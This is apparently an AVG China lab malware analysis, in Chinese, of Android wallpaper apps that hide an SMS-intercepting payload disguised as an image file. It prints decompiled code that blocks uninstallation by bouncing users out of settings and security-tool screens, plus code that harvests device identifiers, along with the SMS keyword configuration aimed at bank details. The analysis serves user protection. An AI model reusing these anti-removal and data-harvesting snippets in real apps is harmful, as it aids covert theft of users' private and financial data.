有没有想过传说中的画皮出现在您的生活中?有没有兴趣看一看美丽皮囊之下的肮脏交易?近期AVG中国实验室监测到中国地区安卓平台出现了大量的恶意壁纸类应用,利用社会工程学,揣摩各类人群的喜好,制作成秀色可餐的壁纸应用,但在这美丽的画皮之下,还隐藏了处心积虑、手段阴险的罪恶行为,下面就让我们撕开这层美丽的外衣,看看这警醒世人的恶鬼。
此类病毒以伪装为壁纸应用,将Payload藏匿于应用包中,利用社会工程学,诱惑用户下载与安装Payload,一旦安装激活,恶意应用将采取重重手段阻止用户卸载,除了获取用户的隐私外,还将通过配置文件指定关键字拦截短信并转发,还可接收短信进行配置文件升级、远程发送短信等操作,不得不说病毒作者为了获利,处心积虑,绞尽脑汁。
病毒作者的上传渠道仍旧是国内的第三方市场与论坛,主题以情色角度出发为多,看来病毒作者深谙此道,也了解国内安卓市场的用户构成,同时还不忘带上热点话题“泷泽萝拉”以及女性朋友喜爱的“刘德华”,还有受众面较广的“萌物”等,统统将其打包为恶意应用供用户下载。
下面让我们从中选出一例为大家详细解释此类病毒:
如下图所示,名为“帮女同事修电脑动态壁纸”的应用,号称壁纸内含图片是发布者帮女同事修电脑时发现的照片,描述其含有58张图片,并放出了四张截图:
但遗憾的是,解包后,我们只看到了5张图片,比图片还要赤裸裸的欺骗行为已经初露端倪:
作为国内较大的第三方市场,我们在“机锋市场”中也发现了这一应用,不过机锋市场作为一家国内专业的专业市场,对待恶意软件毫不手软,下架迅速,值得鼓励:
下图展示了安装后的一些信息:
让我们启动“她”,位于动态壁纸:
壁纸启动后,弹出对话框,提示用户,“请安装下面的[美女游戏]获取积分100点,积分获取后可永久使用”。
确定安装后,将弹出“Android系统服务”(payload)的安装请求:
一旦用户选择了安装,将弹出激活设备管理器的对话框,病毒作者对其编写的“Android系统服务”描述为:“推荐激活系统服务,系统服务可以帮您的最大程度的节省电量”。
如果用户试图选择取消,对不起,它还将继续强制弹出这个对话框,直到用户选择了“激活”为止:
程序中还对某些可能对其造成被卸载或被停止等威胁的情况进行了处理,当进入以下界面后,将强制弹回至系统首页:
1、 查看病毒的详细安装信息。
2、 查看设备管理器。
3、 进入国内某手机安全软件的一键加速界面
public void handleNewLine(String s)
{
(new Message()).obj = s;
if (s.contains("android.intent.action.VIEW cmp=com.android.settings/.InstalledAppDetails") || s.contains("android.intent.action.DELETE")
&& s.contains(getPackageName()) || s.contains("cmp=com.android.settings/.DeviceAdminSettings") || s.contains("android.settings")
&& s.contains(getPackageName()) || s.contains("com.qihoo360.mobilesafe/.opti.onekey.ui.OptiOneKeyActivity"))
{
Intent intent = new Intent("android.intent.action.MAIN");
intent.setFlags(0x10000000);
intent.addCategory("android.intent.category.HOME");
startActivity(intent);
}
}
Payload位于壁纸安装包的资源文件夹内文件名为“a33.jpg”,企图伪装成图片文件,实质为APK安装包,包名“android.phone.com”
具有以下权限:
android.permission.RECEIVE_BOOT_COMPLETED"
android.permission.RECEIVE_SMS
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.WRITE_SMS
android.permission.INTERNET
android.permission.ACCESS_NETWORK_STATE
android.permission.READ_PHONE_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.READ_LOGS
android.permission.KILL_BACKGROUND_PROCESSES
android.permission.RESTART_PACKAGES
android.permission.GET_TASKS
这些权限将被用于收发、读写短信,自我保护,获取系统信息等功用。
下列代码展示了其获取系统信息的功能,包含了手机型号、系统版本、语言、网络状态、是否ROOT等:
mActivityManager = (ActivityManager)getSystemService("activity");
getRunningServiceInfo();
Collections.sort(serviceInfoList, new comparatorServiceLable(null));
obj = (TelephonyManager)getSystemService("phone");
s5 = (new StringBuilder()).append(((TelephonyManager) (obj)).getDeviceId()).toString();
s2 = (new StringBuilder()).append(((TelephonyManager) (obj)).getSimSerialNumber()).toString();
obj2 = (new StringBuilder()).append(android.provider.Settings.Secure.getString(getContentResolver(), "android_id")).toString();
obj2 = new UUID(((String) (obj2)).hashCode(), (long)s5.hashCode() << 32 | (long)s2.hashCode());
((UUID) (obj2)).toString();
((TelephonyManager) (obj)).getSubscriberId();
((TelephonyManager) (obj)).getLine1Number();
Build.MODEL;
((WifiManager)getSystemService("wifi")).getConnectionInfo().getMacAddress();
((TelephonyManager) (obj)).getSimCountryIso();
此病毒一改以往的网络C&C服务器控制方式,采用全程短信控制,病毒作者目前使用的手机号为“+8613093632006”,来自安徽省中国联通。
采用配置文件对恶意软件行为进行控制,配置文件含有D、K、zdh,三个字段,分别表示了服务端号码(手机号)、关键字等。使用S、J、M、con、rep、E、xgh、xgnr等字段进行配置文件升级、短信发送、伪造等功能。
配置文件内容:
<?xml version='1.0' encoding='utf-8'?>
<up>
<H>
<D>13093632006</D>
</H>
<K>
<n>转</n>
<n>卡号</n>
<n>姓名</n>
<n>行</n>
<n>元</n>
<n>汇</n>
<n>款</n>
<n>hello</n>
</K>
<A>
<zdh>10</zdh>
</A>
</up>
说了这么多细节,病毒作者到底能通过这些下流手段获得什么呢?
1、通过灵活配置短信,拦截短信、伪造短信,利用手机话费进行消费。
2、获取银行卡号,姓名等信息,且取款密码同时在短信中泄露,或密码为生日等弱口令,将有可能被其利用,例如:如果用户开通了网上银行且开通了手机支付,可利用网银进行消费。
3、获取用户大量隐私信息,可针对某位用户或某类用户进行定向钓鱼欺骗,谋求更多获利的可能性。
可以看出,此类病毒对用户的危害巨大,通过上面的分析,我们可以发现,病毒作者主要利用了两种手段,一为诱惑,二为欺骗,希望大家都可以做到:耐得住寂寞,经得起诱惑。
撕掉恶鬼的画皮后,为了帮助大家建立良好的手机安全防范意识,下面为大家提供几条建议:
1、 对于这类无实际意义且明显带有诱惑性质的应用,应小心安装。
2、 论坛内里鱼龙混杂,应用的安全性要小于第三方市场,而第三方市场的安全性,又小于官方市场,应谨慎识别、安装。
3、 培养自己的软件使用安全意识,经常阅读AVG手机安全软件的报告,可以帮助您建立起这种意识。
4、 除了国内常见的手机安全辅助工具,可同时安装一款全球知名的专注于反病毒的手机安全软件。
